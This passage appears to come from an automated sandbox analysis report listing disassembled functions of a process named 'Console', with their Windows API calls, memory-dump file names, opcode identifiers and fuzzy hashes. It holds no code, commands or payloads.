                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,0150E144,?), ref: 0116B96A
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,0150E144,?), ref: 0116BA91
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,0159B9F0,?,?,?,?,?,?,?,00000000), ref: 0116C09E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,0159B9F0,?,?,?,?,?,?,?,00000000), ref: 0116C0C4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,0159B9F0,?,?,?,?,?,?,?,00000000), ref: 0116C0ED
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2606610500-0
                                                                                                                                                                                                                          • Opcode ID: d0aa15be6abd80756f993976d561a4b2b632f683db2ad8f8a74a496a89c0ebd3
                                                                                                                                                                                                                          • Instruction ID: 070396d6683d0cc29173d1d533ffa89c5696f633f5826785dcbc6babcbad51cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0aa15be6abd80756f993976d561a4b2b632f683db2ad8f8a74a496a89c0ebd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02524DB19042289FEF258F14CC44BE9BBBAFB85314F0042D9E54DA7290DB325EA4DF55
                                                                                                                                                                                                                          Function 00FF3500 Relevance: 9.3, APIs: 6, Instructions: 274stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FF3604
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FF3746
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,7CAB6A82,?,?), ref: 00FF37EF
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00FF37FB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FF38F7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FF3920
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeapstrcpy_sstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2476811093-0
                                                                                                                                                                                                                          • Opcode ID: e51be05d7c464923bb390e605ed9c2332906ed5ddd35f0cf64ea3ab15a691421
                                                                                                                                                                                                                          • Instruction ID: 581d592ff70242a1244546f5ea4bf6f0331ac565e38ae2886f015ac28a28908c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e51be05d7c464923bb390e605ed9c2332906ed5ddd35f0cf64ea3ab15a691421
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CC17AF19002589BDB20CF24CC89BEDBBB4AF19314F4441D8EA09AB291DB755F88CF59
                                                                                                                                                                                                                          Function 0127DBF0 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • CreateSemaphoreExW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,00000000,02100002,7CAB6A82,00000000,?), ref: 0127DCC1
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0127DCDB
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD08
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD15
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD71
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD7E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateHeap$AllocateEventProcessSemaphore
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 9831839-0
                                                                                                                                                                                                                          • Opcode ID: 11e5881ab59fe5c897f54a5b60eba0f4f1a6c8e30f040061010132d160c6d1bb
                                                                                                                                                                                                                          • Instruction ID: 46f748684b6154a387cd2edcc109768ef978dddfc1962381401e0ae7a08411df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e5881ab59fe5c897f54a5b60eba0f4f1a6c8e30f040061010132d160c6d1bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E91ACB1A1530A9BEB21CFA9C8047AFBBF0FF54720F14461ED925A73D0E7B599008B94
                                                                                                                                                                                                                          Function 01095AA0 Relevance: 5.3, APIs: 4, Instructions: 311memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095BEE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095CB3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095DFA
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000004), ref: 01095EF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1264717999-0
                                                                                                                                                                                                                          • Opcode ID: 838c1aa9fb9efe8b556e807423fdfdab502589e796cbb2281095e01eeffed23e
                                                                                                                                                                                                                          • Instruction ID: c980f15846e6ce4e388f0f5c4782e37f3bd02774e801082df6844dd812536017
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 838c1aa9fb9efe8b556e807423fdfdab502589e796cbb2281095e01eeffed23e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00C13B75E002289BDF69CF19CC51BE9BBF5AB49310F1441DAD989A7390DB30AE91CF90
                                                                                                                                                                                                                          Function 01417B80 Relevance: 5.2, APIs: 4, Instructions: 197COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,00000000,00000000,?,?,?,?,01417248,?,7CAB6A82), ref: 01417BFF
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,01417248,?,7CAB6A82), ref: 01417C3B
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(7CAB6A82,00000000,00000000,?,?,?,?,01417248,?,7CAB6A82), ref: 01417D39
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000020,00000000,00000000,?,?,?,?,01417248,?,7CAB6A82), ref: 01417D68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2190258309-0
                                                                                                                                                                                                                          • Opcode ID: 7477d3d3b823fb0d7de92fbd123e79aa8106c22165a324ae9af1ec20e8d6bd3a
                                                                                                                                                                                                                          • Instruction ID: 562dafe1e81d41366d00510b009712c8923e9120533ad4a2b51a7876bf1c1f08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7477d3d3b823fb0d7de92fbd123e79aa8106c22165a324ae9af1ec20e8d6bd3a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3161C770A002068FEB28CF5CC4907BBBBB1FF44306F64846ED64697369E7719582CB90
                                                                                                                                                                                                                          Function 0141A700 Relevance: 4.7, APIs: 3, Instructions: 218memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000000,?,?,00000000,?), ref: 0141A7EC
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0141A86E
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0141A925
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 1d8072be5c330cc02ccf5aad109bb1978658a88084ac372ff545856dc8789f12
                                                                                                                                                                                                                          • Instruction ID: 5b107ed670340ea1da5196af503c86d28589a6549cb8def9203b56189c8b495b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8072be5c330cc02ccf5aad109bb1978658a88084ac372ff545856dc8789f12
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99819D71E0121A9FDB14CFA9C980AAEBBF5BF48314F29816AD915F7314D734E942CB90
                                                                                                                                                                                                                          Function 014A93F0 Relevance: 3.2, APIs: 2, Instructions: 230COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnabledXStateFeatures.KERNEL32(00000000,00000048,?,?,0141332E,00000000,00000048,?), ref: 014A94D9
                                                                                                                                                                                                                          • GetEnabledXStateFeatures.KERNEL32(?,0141332E,00000000,00000048,?), ref: 014A954F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnabledFeaturesState
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1557480591-0
                                                                                                                                                                                                                          • Opcode ID: c58295d1766918c409b8c060a5104ad1d8b60370715bce1d79dd30c9094882a6
                                                                                                                                                                                                                          • Instruction ID: 1130f5b8d5cdb832a2820965c70cf8b9dcb0eccd6106fb6a6ba4500a989a0dba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c58295d1766918c409b8c060a5104ad1d8b60370715bce1d79dd30c9094882a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC71C8B2E052144BFB59CE1DC5C53ABBB92EF94318F5AC07ADE4A9B391D6748801CB50
                                                                                                                                                                                                                          Function 00FEA4F0 Relevance: 1.9, Strings: 1, Instructions: 630COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • System.Runtime.CompilerServices.PreserveBaseOverridesAttribute, xrefs: 00FEABA7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: System.Runtime.CompilerServices.PreserveBaseOverridesAttribute
                                                                                                                                                                                                                          • API String ID: 0-2910636169
                                                                                                                                                                                                                          • Opcode ID: 197c15ba596ae6041dc1e10b5a75937782cb413ff02bb39d8d745cc6e75c8434
                                                                                                                                                                                                                          • Instruction ID: ca61ecb08e228d465427e547dbcbb666270be0375d5fc2c64acee0acdec819db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 197c15ba596ae6041dc1e10b5a75937782cb413ff02bb39d8d745cc6e75c8434
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E329071E002589FDB18DF69C891BFEB7B5BF48310F144169E816AB391DB38AD01DBA1
                                                                                                                                                                                                                          Function 01294B00 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateGuid
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531319410-0
                                                                                                                                                                                                                          • Opcode ID: 346b86255a930b9388d77ede410da6dd81622cf56e01a0f364f65289dac4e0eb
                                                                                                                                                                                                                          • Instruction ID: aab5070adcf5af8ad5bc39ffe5af8380ec161c9aadb7d6de4b062bd5ad63f3ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 346b86255a930b9388d77ede410da6dd81622cf56e01a0f364f65289dac4e0eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77617972A143818BCB14DF2CC5817A9B7E4EF58314F09467EED48AF291DB70E945C792
                                                                                                                                                                                                                          Function 01067B50 Relevance: 1.6, APIs: 1, Instructions: 315memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,01063F1F,?,?), ref: 01067CAE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: a9e455b89fe129166a3bcba87a04909d1b26f59e92f84d55d18e3cd7eef334c8
                                                                                                                                                                                                                          • Instruction ID: 01bc02ded2473c08d62a4b43f757ca97bb49630e3628ef154c245165fdc45019
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9e455b89fe129166a3bcba87a04909d1b26f59e92f84d55d18e3cd7eef334c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42B11635A001148FDB28CF6CC8917BDBBF6EB85314F1446AEE996DB295DA309D44CB60
                                                                                                                                                                                                                          Function 011852A0 Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
